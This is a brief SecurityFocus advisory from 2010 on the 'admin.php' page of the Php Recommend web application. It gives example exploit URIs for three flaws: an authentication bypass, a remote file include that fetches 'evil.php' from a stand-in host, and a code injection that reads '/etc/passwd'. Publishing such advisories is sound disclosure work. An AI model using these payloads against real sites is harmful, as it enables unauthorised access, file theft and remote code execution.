Php Recommend 'admin.php' Multiple Remote Vulnerabilities

An attacker can exploit this issue via a browser.

The following example URIs are available:

For the authentication-bypass vulnerability:
http://www.example.com/admin.php?submit=submit&form_admin_user=USERNAME&form_admin_pass=PASSWORD

For the remote-file-include vulnerability:
http://www.example.com/admin.php?submit=submit&form_include_template=http://example.com/evil.php

For the code-injection vulnerability:
http://www.example.com/admin.php?submit=submit&form_aula=';readfile('/etc/passwd');'


 

Privacy Statement
Copyright 2010, SecurityFocus